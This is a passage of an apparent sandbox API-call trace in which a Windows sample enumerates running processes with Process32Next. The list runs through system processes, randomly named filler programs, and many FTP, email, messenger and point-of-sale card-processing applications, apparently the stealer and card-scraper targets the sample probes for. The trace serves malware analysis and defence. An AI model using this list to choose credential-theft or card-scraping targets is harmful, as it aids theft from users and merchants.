dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0198.425] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0198.427] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0198.428] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0198.430] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.433] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.439] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0198.441] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.443] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.445] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.447] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.607] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.609] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.611] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.613] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0198.616] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0198.618] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0198.624] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.626] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.628] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0198.630] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0198.633] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0198.635] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0198.641] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.644] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0198.646] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0198.648] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0198.650] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0198.704] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0198.706] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0198.707] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0198.709] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0198.711] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0198.712] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0198.714] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0198.718] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0198.719] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0198.721] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0198.722] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0198.724] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0198.725] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0198.727] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0198.728] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0198.732] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0198.733] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0198.735] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0198.736] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0198.737] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0198.739] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0198.745] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0198.747] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0198.748] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0198.749] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0198.751] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0198.753] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0198.754] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0198.756] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0198.758] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0198.760] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0198.767] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0198.769] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0198.770] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0198.772] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0198.775] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0198.780] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0198.782] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0198.784] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0198.789] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0198.790] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0198.793] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0198.794] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0198.796] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0198.798] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0198.799] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0198.801] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0198.803] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0198.805] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0198.807] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0198.811] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0198.813] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0198.814] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0198.816] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0198.818] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0198.819] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0198.821] Process32Next (in: hSnapshot=0x2274, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0198.923] Process32Next (in: hSnapshot=0x2274, 